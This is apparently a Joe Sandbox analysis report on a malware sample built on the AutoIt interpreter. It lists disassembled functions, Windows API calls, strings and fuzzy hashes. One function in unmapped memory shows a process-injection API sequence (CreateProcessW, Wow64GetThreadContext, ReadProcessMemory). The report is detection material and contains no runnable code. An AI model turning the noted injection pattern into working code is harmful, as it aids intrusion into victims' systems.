Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 741f56efaf42cfadeb625e97ee8e41c7e4f7098e6e5ea2d3ef0ca7754008a6d1
Instruction ID: 82fa651eb36aaf61c45c3f84c88b3939faa7653c2a5ae98e720d915140a66f6a
Opcode Fuzzy Hash: 741f56efaf42cfadeb625e97ee8e41c7e4f7098e6e5ea2d3ef0ca7754008a6d1
Instruction Fuzzy Hash: FD31D171008704EFDB25EB60DC4AFEB77D8BF84344F10891AF599920A1DF78A648CB96

Function 0077686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00774DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774E0F

_free.LIBCMT ref: 007AE263
_free.LIBCMT ref: 007AE2AA

Part of subcall function 00776A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00776BAD

Strings

Bad directive syntax error, xrefs: 007AE292
>>>AUTOIT SCRIPT<<<, xrefs: 007AE039

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 96dd4b16e239b202d76bfffc6e78e2132d8a4956d0a8aa0dbda59c8c385b89ad
Instruction ID: 9b4a0c962bb4340924cf31d91e1f0d889fa7a792fae69d5d435d476d7f4210ae
Opcode Fuzzy Hash: 96dd4b16e239b202d76bfffc6e78e2132d8a4956d0a8aa0dbda59c8c385b89ad
Instruction Fuzzy Hash: 85918E71A10219EFCF18EFA4CC959EEB7B4FF45310F10852AF815AB2A1DB78A915CB50

Function 007735B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007735A1,SwapMouseButtons,00000004,?), ref: 007735D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007735A1,SwapMouseButtons,00000004,?,?,?,?,00772754), ref: 007735F5
RegCloseKey.KERNELBASE(00000000,?,?,007735A1,SwapMouseButtons,00000004,?,?,?,?,00772754), ref: 00773617

Strings

Control Panel\Mouse, xrefs: 007735D2

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a7fda972b1254426e0647ca646441db08ad2a8e747361711f1f6ef457e0340dd
Instruction ID: 6302dfecc0cad6760cf1ece2fcb63672befcfbf6dcfb6653469d59d176864a33
Opcode Fuzzy Hash: a7fda972b1254426e0647ca646441db08ad2a8e747361711f1f6ef457e0340dd
Instruction Fuzzy Hash: A7114571611218BFDF208F64DC80EBEBBB8EF04780F108469E809D7210EA759E40ABA4

Function 0114DC70 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0114E42B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0114E4C1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0114E4E3

Memory Dump Source

Source File: 00000000.00000002.1720818394.000000000114C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0114C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114c000_gKvjKMCUfq.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: 4aaeec945d2bdb7512778edf4f17c93636f0636bff6eda998c3a8d0fe372b311
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: F962FC30A156589BEB28CFA4C850BDEB772FF58700F1091A9D10DEB390E7799E81CB59

Function 007D955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00774EE5: _fseek.LIBCMT ref: 00774EFD

Part of subcall function 007D9734: _wcscmp.LIBCMT ref: 007D9824
Part of subcall function 007D9734: _wcscmp.LIBCMT ref: 007D9837

_free.LIBCMT ref: 007D96A2
_free.LIBCMT ref: 007D96A9
_free.LIBCMT ref: 007D9714

Part of subcall function 00792D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00799A24), ref: 00792D69
Part of subcall function 00792D55: GetLastError.KERNEL32(00000000,?,00799A24), ref: 00792D7B

_free.LIBCMT ref: 007D971C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 7eeaf65cf3a394bae244b90c0d503baa7e18ae3dc196388e22d04d3772684ca3
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 74514EB1904218EFDF259F64DC85AAEBB79EF48310F10449EF209A3351DB755A81CF58

Function 0079470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007947A0
__flush.LIBCMT ref: 007947C0
__write.LIBCMT ref: 007947F3
__flsbuf.LIBCMT ref: 00794821

Part of subcall function 00798B28: __getptd_noexit.LIBCMT ref: 00798B28

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: b0afd604aabfc32ed630ad7b31aedcf2e25476987c76f7c5529d4d5aaaf9405b
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 1041D474A00749AFDF28CEA9F884DAE77A5EF46360B24857DE815C7640EB78DD428B40

Function 007744A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007744CF

Part of subcall function 0077407C: _memset.LIBCMT ref: 007740FC
Part of subcall function 0077407C: _wcscpy.LIBCMT ref: 00774150
Part of subcall function 0077407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00774160

KillTimer.USER32(?,00000001,?,?), ref: 00774524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00774533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007AD4B9

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 4deba7a90cf1f4acea4ae8bf6a8ed083c7a919b63b9ee1ffd7e284ba5f03d78e
Instruction ID: 736045e411ed08d108ab05bb3286c388ffe606f187c1b2d4e9f51c8e5047d998
Opcode Fuzzy Hash: 4deba7a90cf1f4acea4ae8bf6a8ed083c7a919b63b9ee1ffd7e284ba5f03d78e
Instruction Fuzzy Hash: 1121F5B0504784AFEB329B24C849BE7BBECAF46314F04409DE68E56141C7782E84CB51

Function 00777285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007AEA39
GetOpenFileNameW.COMDLG32(?), ref: 007AEA83

Part of subcall function 00774750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00774743,?,?,007737AE,?), ref: 00774770

Part of subcall function 00790791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007907B0

Strings

X, xrefs: 007AEA51

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 45f3078ba770ed6d844d2cc79a2407d4691dbad6805164b9bc12f707d6f0db47
Instruction ID: 3b58d6b507d1f0ba06f686ab43d6e263fb9b0971df085dcf41acdffb15563692
Opcode Fuzzy Hash: 45f3078ba770ed6d844d2cc79a2407d4691dbad6805164b9bc12f707d6f0db47
Instruction Fuzzy Hash: F521A171A00258DBCF059FD4D849BEE7BF8AF49314F008019E508EB242DBB85989CFA1

Function 007D98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 007D98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007D990F

Strings

aut, xrefs: 007D9909

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: a3e094a786c8c903d3a1f8d2f106e35e242440c170292d1da638f8a47addd7ba
Instruction ID: efce4ff74859158dd6f1bf63f539ef1fe10b0f1fda021e46568d6547f7a97971
Opcode Fuzzy Hash: a3e094a786c8c903d3a1f8d2f106e35e242440c170292d1da638f8a47addd7ba
Instruction Fuzzy Hash: 1AD05E7994030DBBDB50ABA4EC0EFAA773CFB04700F0082B1FA54D11A1EEB49598CB95

Function 007ECADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56ea2041fccea06ead0bd7c01b0cd8f93be8589fc4bb9fdd4dca6a34445ea063
Instruction ID: b20d52b37698c777fb832ed5c98e77bbde1e37de57307c6c2b93efb3fa238eac
Opcode Fuzzy Hash: 56ea2041fccea06ead0bd7c01b0cd8f93be8589fc4bb9fdd4dca6a34445ea063
Instruction Fuzzy Hash: DAF14575608340DFCB14DF29C484A6ABBE5FF89314F14896EF8999B251D738E906CF82

Function 0077F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00790162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00790193
Part of subcall function 00790162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0079019B
Part of subcall function 00790162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007901A6
Part of subcall function 00790162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007901B1
Part of subcall function 00790162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007901B9
Part of subcall function 00790162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007901C1

Part of subcall function 007860F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0077F930), ref: 00786154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0077F9CD
OleInitialize.OLE32(00000000), ref: 0077FA4A
CloseHandle.KERNEL32(00000000), ref: 007B45C8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 47e2da2cb6abcee1f7e926cc150db32807547b76e05041e5b72af33400bb9039
Instruction ID: 7cc1b4f028b46ccb62621efaf4b39f5d53bdf1923e3ca107305ab5e56b0dc114
Opcode Fuzzy Hash: 47e2da2cb6abcee1f7e926cc150db32807547b76e05041e5b72af33400bb9039
Instruction Fuzzy Hash: EE81CDF0905A40CFC788EF79E8456587BE5FBD9306B50892AD118CB371EB744588CF59

Function 0077434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00774370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00774415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00774432

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: b2af3e4eb05422b9006a4cdf99b18e813a96fa3d773c8127d417e3cbe5353860
Instruction ID: c83baa03d0c5f4e019b807d611891503c742fa1d89a775d0d42b1b3ebf40b31e
Opcode Fuzzy Hash: b2af3e4eb05422b9006a4cdf99b18e813a96fa3d773c8127d417e3cbe5353860
Instruction Fuzzy Hash: C23193B0504701DFDB21DF24D8846ABBBF8FB88348F004D2EF69E92251D774A944CB52

Function 0079571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00795733

Part of subcall function 0079A16B: __NMSG_WRITE.LIBCMT ref: 0079A192
Part of subcall function 0079A16B: __NMSG_WRITE.LIBCMT ref: 0079A19C

__NMSG_WRITE.LIBCMT ref: 0079573A

Part of subcall function 0079A1C8: GetModuleFileNameW.KERNEL32(00000000,008333BA,00000104,?,00000001,00000000), ref: 0079A25A
Part of subcall function 0079A1C8: ___crtMessageBoxW.LIBCMT ref: 0079A308

Part of subcall function 0079309F: ___crtCorExitProcess.LIBCMT ref: 007930A5
Part of subcall function 0079309F: ExitProcess.KERNEL32 ref: 007930AE

Part of subcall function 00798B28: __getptd_noexit.LIBCMT ref: 00798B28

RtlAllocateHeap.NTDLL(010B0000,00000000,00000001,00000000,?,?,?,00790DD3,?), ref: 0079575F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: fc0c55e343a2f0662fadcd2bf05b8dfe915039bd182b5c239a9a9419b3f6fc9d
Instruction ID: 74b115816f63289cbdd9f910f7d409d96493afc54c5ac9107614e5b3e7433afc
Opcode Fuzzy Hash: fc0c55e343a2f0662fadcd2bf05b8dfe915039bd182b5c239a9a9419b3f6fc9d
Instruction Fuzzy Hash: C2012471240B21EADE1227B8FC8AB2E7398DF82362F100426F505DB1C1DFBC8E418761

Function 007D98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007D9548,?,?,?,?,?,00000004), ref: 007D98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007D9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007D98D1
CloseHandle.KERNEL32(00000000,?,007D9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D98D8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 7c7c783e3ddbb23735007cd077e63827cf94ccfb6b0e7fbbd34a06c555d4a562
Instruction ID: ff759e5a9b4781e24177412ac1884765c2d61be22e5a92d4887e9a8fe72e7794
Opcode Fuzzy Hash: 7c7c783e3ddbb23735007cd077e63827cf94ccfb6b0e7fbbd34a06c555d4a562
Instruction Fuzzy Hash: C3E08632140218BBD7211B54EC09FDE7F29AF06B60F148121FB24690E08BB51521D79C

Function 007D8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007D8D1B

Part of subcall function 00792D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00799A24), ref: 00792D69
Part of subcall function 00792D55: GetLastError.KERNEL32(00000000,?,00799A24), ref: 00792D7B

_free.LIBCMT ref: 007D8D2C
_free.LIBCMT ref: 007D8D3E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 03e9b7a1a946971aec7a98331e373fcacdc4b4028d47253c505b46e9dac63641
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: BAE017A1701601A6CF64B6B8B948F9323ED4F9C352B18091EB40DD72CBCE6CF8838128

Function 0077A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 007AFC01

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 94d6e9bc3f845269b5477a7255c806eab294d60e2d8b8235d69353aeb3e7e3ec
Instruction ID: 05ee5141ccfa846ad3e5545e9ef8a7f4c7fa2ed99e364312120a26c1f8b93001
Opcode Fuzzy Hash: 94d6e9bc3f845269b5477a7255c806eab294d60e2d8b8235d69353aeb3e7e3ec
Instruction Fuzzy Hash: 90225870608201EFDB24DF24C494B6AB7E1BF85344F15C96DE99A8B362D739ED41CB82

Function 00774C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00774CBA

Strings

EA06, xrefs: 007AD8CC

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 290fd25ac796f0b27147dc21af6079fe586d1f2c681fa18fa547e3f5b841de0b
Instruction ID: ec6756fb4cf9508fb8ee4cb77ff192a5dd3ce3a673c42f57e4f4b92b4cf7f339
Opcode Fuzzy Hash: 290fd25ac796f0b27147dc21af6079fe586d1f2c681fa18fa547e3f5b841de0b
Instruction Fuzzy Hash: C9419F21B00258EBDF329B548C557BE7B66DB46390F28C475EDCE97282D72C5D4483A1

Function 00777A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00777AAB
_memmove.LIBCMT ref: 00777B16

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
